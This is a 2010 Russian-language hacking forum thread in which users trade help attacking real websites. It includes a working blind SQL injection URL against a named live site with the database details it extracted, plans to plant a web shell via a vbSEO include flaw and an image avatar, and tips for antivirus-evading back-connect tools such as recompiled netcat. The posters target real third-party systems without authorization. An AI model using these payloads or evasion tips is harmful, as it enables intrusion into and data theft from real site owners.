
05.04.2010, 16:25
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Сообщение от Gorev
да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля
Вот видишь, как помогло!
http://forums.ibresource.ru/index.php?act=Print&client=printer&f=30&t=6657
Мотай до первого упоминания "ppassword".
Как видно, этот дополнительный код забит в самом файле, поэтому без возможности чтения файлов на серваке ты его не узнаешь.
|
|
|

05.04.2010, 16:36
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
да уже сам вкурил что к чему...тот же форум почитал...читалка не робит , так что шансы на заливку шелла урезались очень сильно.Но в любом случае спасибо большое з аоказанную помосйь и потерянное время.
|
|
|

05.04.2010, 17:31
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Хочу применить всем ивестную дыру в vbseo 3.3.2 (инклуд). Но столкнулся с проблемов. Когда хочу поставить картинку с шеллом себе на аватар пишет:
Пределы измерений для этого типа файла составляют 100 на 100. Мы не можем уменьшить ваш файл, поэтому сделайте это самостоятельно и загрузите снова. Сейчас размеры вашего файла составляют 8236 на 8230.
хотя и размеры правильные и все остальное.
Как решить эту проблему?
|
|
|

05.04.2010, 19:02
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами:
9288289
Репутация:
40
|
|
Через что можно сделать back connect кроме netcat. Net cat не подходит, т.к. палится антивирусом.
Читал что можно через netwox но так и не разобрался как. Знающие подскажите!
|
|
|

05.04.2010, 19:33
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Есть альтернативная версия netcat (просто заново скомпилированная - она не детектится). Еще есть mocat. Поищи в гугле.
|
|
|

05.04.2010, 19:50
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
Помогите please докрутить скуль
http://www.nnovia.com/products.php?id=31%20and%201=2
|
|
|

05.04.2010, 20:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
|
|
|

05.04.2010, 21:24
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
Сообщение от Pashkela
Код:
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
Blind MYsql system information:
----------------------------------
@@basedir: /
@@tmpdir: /tmp/
database(): nnovia3_osc1
@@version_compile_os: pc-linux-gnu
version(): 5.0.89-community
@@datadir: /var/lib/mysql/
user(): nnovia3_osc1@localhost
а таблицы с юзверями там всеравно нет.....
|
|
|

05.04.2010, 21:26
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
2 Pashkela thanks.
Я ввожу твою строку
http://www.nnovia.com/products.php?id=-31+or+1=1+and+substring(version(),1,1)=5
и на экране ничего не выводится. или эта конструкция работает только с тулзой?
Последний раз редактировалось Darren; 06.04.2010 в 00:00..
|
|
|

05.04.2010, 21:30
|
|
Banned
Регистрация: 05.04.2010
Сообщений: 1
С нами:
8474682
Репутация:
0
|
|
Сообщение от Darren
Pashkela thanks.
а от чего зависит
+and+substring(version(),1,1)=3
+and+substring(version(),1,1)=4
или?
+and+substring(version(),1,1)=5
От того, какая версия мускула стоит.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|